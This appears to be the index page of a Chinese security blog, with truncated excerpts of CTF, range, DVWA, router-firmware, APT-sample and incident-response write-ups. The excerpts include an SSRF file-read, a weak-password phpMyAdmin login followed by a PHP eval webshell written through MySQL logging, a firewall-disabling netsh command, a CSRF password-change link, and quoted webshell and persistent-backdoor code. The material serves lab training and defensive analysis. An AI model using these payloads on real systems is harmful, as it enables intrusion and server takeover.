愚安科技二面靶场WriteUp
二面过程记录文档
WEB1
FLAG1
先测试目标站点功能,发现并未对用户的输入进行过滤,可以发起任意的内网或者外网的请求,推测存在SSRF
外网:
内网:
使用 file 协议file:///flag读到根目录的flag
meetsec-web1{flag1-6d5e5c2bb397ba7727b58df59b35f66a}
FLAG2
再尝试获取存在 SSRF 漏洞的本机内网 IP
地址信息,内网网段是172.18.240.0/24
123456789file:///etc/hosts 的快照如下:127.0.0.1 localhost::1 localhost ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allrouters172.18.240.5 17b86b8e3c70
写一个python脚本,通过dict协议探测内网服务:
123456789101112131415161718 ...
红日靶场
红日靶场-ATT&CK实战(一)
配置如图
nmap扫描我们部署Web服务的主机
有两个开放的端口,扫描其对应挂载的服务
爆破路径
存在后台登录页面:http://192.168.72.128/phpMyAdmin/
尝试弱口令(root/root)成功登录:
查询MySQL数据库的通用日志
得到路径C:1.log下的日志文件
我们考虑将日志文件放到站点根目录,并改为.php文件后缀
构造sql查询,通过sql查询往日志文件中写入我们的php命令,进而get
shell提权
这里需要注意开启general_log读取功能,使我们每一条查询都出现在日志文件里面,这样才能成功写php日志马
1SET GLOBAL general_log='on';
输入构造的shell命令:SELECT '<?php eval($_POST["shell"]);?>'
蚁剑成功连上
尝试关掉防火墙(建议手敲命令进去):
123netsh advfirewall set domainprofile ...
APT样本分析
APT-C-35(360)/APT-Q-38(奇安信)样本分析
360内部编号:APT-C-35
奇安信内部编号:APT-Q-38
从AppAnyRun通过哈希值下载到样本
沙箱分析文件行为
该EXE样本图标被伪装为PDF
DIE发现该可执行文件存在签名,查看其签名为Ebo Sky Tech Inc
发现其签名证书公司在苹果商店也曾上线过应用(
该SSL签名证书早在4月份便被MalwareHunterTeam在推上曝光过被该恶意组织利用
IDA对程序进行静态分析,程序首先获取了控制台窗口句柄,而后使用
SW_HIDE 隐藏控制台窗口
先分析函数sub_672FE0(),这个函数采用互斥锁以单例模式初始化全局变量
其中sub_671B00()中存在大量二进制0101字符串,以这种方式编码的字符串其中一部分是用于异或解密的key,这些key被用来还原样本导入的API名称等字符串
根据之前沙箱动态分析结果,字符串交叉引用,定位到核心恶意功能的实现函数
构建恶意任务计划命令
每10分钟执行一次
实际运行效果(当然这里是 ...
Linux Kernel Pwn 学习笔记
Linux Kernel Pwn 学习笔记
Basic Intro
内核漏洞利用的特点
简单介绍 Kernel Pwn 和 User-Space Pwn 两者间的区别。
攻击目标
二者最大区别在于攻击目标的不同。
以往我们遇见的用户态Pwn大多以 "命令执行"
为目标编写漏洞利用程序。而内核态Pwn则通常以 "提升权限"
为目标编写漏洞利用程序。在假设攻击者已通过某种手段入侵目标机器的前提下,攻击者利用内核漏洞进一步获取root权限。类似于这样在本地机器上进行权限提升的行为,被称为
LPE (Local Privilege Escalation,本地提权) 。
当然,用户态中也存在可以提升权限的漏洞,但这是因为攻击目标的程序以特权用户身份运行的。在内核漏洞利用中,主要攻击目标有以下两种:
Linux内核
内核模块(Loadable Kernel Modules - LKMs)
Linux内核中的代码(系统调用、文件系统等)以root权限运行,因此当内核本身存在缺陷时,可能导致LPE(本地权限提升)漏洞。
另一类是包含在设备驱动程序等内核模块中的漏洞。 ...
Tenda-AC 路由器漏洞复现
Tenda-AC 路由器漏洞复现
Tenda-AC6 路由器固件
Tenda AC6 V15.03.05.19 路由器
固件下载:https://www.tenda.com.cn/material/show/102681
Tenda-AC15 路由器固件
Tenda AC15 V15.03.1.16 路由器
固件下载:https://www.tenda.com.cn/download/detail-2680.html
基础环境配置
创建Python虚拟环境
目录
1cd ~/Pwn/IoT
创建虚拟环境
1python3 -m venv IoT
激活虚拟环境
1source IoT/bin/activate
binwalk安装
https://github.com/ReFirmLabs/binwalk/wiki/Compile-From-Source
参考github教程
firewalker 安装
1git clone https://github.com/craigz28/firmwalker/
sasquatch SquashFS ...
DVWA 靶场笔记
DVWA 靶场笔记
Brute Force
登录框,Burp抓包,放到Intruder爆破即可,根据响应包的长度得到正确的密码
Command Injection
首先查看源码
请求参数 ip 会直接被拼接到 shell_exec 函数的 ping 命令中
通过构造恶意输入再传递给 shell_exec 函数,进行命令注入攻击
Cross Site Request Forgery
(CSRF)
该页面的链接,点击后即可修改掉用户密码,没有任何校验
可以构造恶意网站,诱导受害者点击,即可修改TA的密码
123<a href="http://198.18.0.1/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" /> <img src="http://127.0.0.1/tupian.jpg" border="0" width="800&qu ...
春秋云境 靶场笔记
春秋云境 靶场笔记
CVE-2022-32991
登录页面
任意注册账户登录
访问
welcome.php:http://eci-2zeddrs0sa8uwhp5l5n9.cloudeci1.ichunqiu.com/welcome.php?q=1
存在参数 q,尝试 sql 注入
Burp 抓包:
123456789101112131415GET /welcome.php?q=1 HTTP/1.1Host: eci-2zeidk6onhgzoxoik7ds.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brReferer: http://eci ...
玄机应急响应WriteUp
第一章 应急响应-
Linux入侵排查
web目录存在木马,请找到木马的密码提交
打包/var/www/html目录下的文件:
tar -cvf archieve.tar .
D盾扫描得到木马路径:\archive\www\html\1.php
1<?php eval($_POST[1]);?>
flag:flag{1}
服务器疑似存在不死马,请找到不死马的密码提交
查看D盾结果中已知后门:\archive\www\html\index.php,每隔usleep(3000);生成一次.shell.php
1<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>
md5解密得flag:flag{hello}
不死马是通过哪个文件生成的,请提交文件名
由 2问 得:flag{index.php}
黑客留下了木马文件,请找出黑客的服务器ip提交
同路径下s ...
VSEC 车联网安全 CTF 挑战
Getting Started
Can you find the interface?
输入 ifconfig,根据 CAN 接口的命名规则(canX、vcanX、slcanX)判断
vcan0 是对应的 can 接口
flag:vcan0
Arbitration
利用 candump 命令可捕获到 CAN
总线传输的数据流,其中,内容分别为:sniffer device | arbitration ID |
size of the CAN packet | CAN data itself
123456b9c80e7d115e:~$ candump vcan0 vcan0 59E [2] 9E 10 vcan0 59E [2] 9E 10 vcan0 59E [2] 9E 10 vcan0 59E [2] 9E 10 vcan0 59E [2] 9E 10
CAN 数据流通过 Arbitration ID 标记每一条消息
这里周期性消息的 Arbitration ID 是 59E
flag:59E
Data F ...
WSL2 Pwn环境部署
Install
在 Microsoft Store 搜索 Ubuntu 安装
(建议安装22.04,其他版本可能存在适配等未知bug)
1wsl --set-default Ubuntu-22.04
在 Windows 功能中启用适用于 Linux 的 Windows 子系统
PowerShell 输入命令:
1Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
1dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
基本环境配置
更新软件包列表
123sudo dpkg --add-architecture i386 # 添加32位支持库sudo apt update && sudo apt -y upgradesudo apt-get install libc6:i386 libncurses5:i386 l ...